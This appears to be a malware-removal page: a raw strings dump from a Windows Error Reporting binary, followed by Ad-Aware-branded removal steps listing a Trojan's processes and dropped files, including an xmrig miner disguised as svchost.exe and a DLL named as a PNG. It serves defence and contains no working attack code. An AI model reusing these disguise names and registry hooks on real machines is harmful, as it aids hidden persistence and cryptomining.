\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\AeDebugProtected
\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\AeDebug
sntdll.dll
WerDiagController.dll
Software\Microsoft\Windows\Windows Error Reporting\Plugins
Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Layers
Software\Microsoft\Windows\Windows Error Reporting\Plugins\FDR\CurrentSession
%s\%s\%u-%u.etl
%s\%s\%u-%u.etl_%d
Microsoft\Windows\FDR
%s-%d
Software\Microsoft\Windows\Windows Error Reporting\Plugins\DriverVerifier
Software\Microsoft\Windows\Windows Error Reporting\Plugins\AppRecorder
%d-AppRecorderEnabled
%s /stop
psr.exe
Software\Microsoft\Windows\Windows Error Reporting\RuntimeExceptionHelperModules
verifier.dll
nVerifier.dll
Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\%s
Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options
lsvchost.exe
"%s" "%s" "%s"
%s\system32\cofire.exe
psapi.dll
sfc_os.dll
werfault.exe
%s\%s-(PID-%u)-%u
%s\%s-(PID-%u).dmp
%s\*-(PID-*)-*
SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\%s
SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit
kernel32.dll
kernelbase.dll
ReportingMode
WinShipAssert
WindowsMessageReportingB1
Windows
ws2_32.dll
Software\Microsoft\SQMClient\%s\AdaptiveSqm\ManifestInfo
%s\Sqm%d.bin
CorporateWerPortNumber
BypassDataThrottling
Software\Microsoft\Windows\Windows Error Reporting\Consent
Windows Problem Reporting
6.1.7600.16385 (win7_rtm.090713-1255)
WerFault.exe
Windows
Operating System
6.1.7600.16385
Microsoft-Windows-WER-Diag/Operational
Remove it with Ad-Aware
- Click (here) to download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Terminate malicious process(es) (How to End a Process With the Task Manager):
WerFault.exe:556
Iphgbnc.exe:3996
Picture.exe:4068
%original file name%.exe:3656
- Delete the original Trojan file.
- Delete or disinfect the following files created/modified by the Trojan:
C:\Windows\Temp\WER4E01.tmp.WERInternalMetadata.xml (51540 bytes)
C:\Windows\Temp\WER4DB2.tmp.appcompat.txt (3176 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\X66G0HIG\x[1].exe (434673 bytes)
C:\Picture.exe (442977 bytes)
C:\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\705A76DE71EA2CAEBB8F0907449CE086_C37EB0A02CA707BDA9677EF4ED9290A5 (1 bytes)
C:\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\C46E7B0F942663A1EDC8D9D6D7869173_D9B9F37ECE595B0B7B6AA12451D392CF (1480 bytes)
C:\Windows\Temp\TarAA15.tmp (2712 bytes)
C:\Windows\Temp\CabAA14.tmp (48 bytes)
C:\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\705A76DE71EA2CAEBB8F0907449CE086_C37EB0A02CA707BDA9677EF4ED9290A5 (1464 bytes)
C:\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\C46E7B0F942663A1EDC8D9D6D7869173_D9B9F37ECE595B0B7B6AA12451D392CF (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\xmrig\svchost.exe (6841 bytes)
%Program Files%\Mysqld\NetSyst96.PNG (118569 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\LQUMIDKJ\NetSyst96[1].dll (115321 bytes)
%Program Files%\Microsoft Iphgbn\Iphgbnc.exe (52 bytes)
- Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
- Reboot the computer.
*Manual removal may cause unexpected system behaviour and should be performed at your own risk.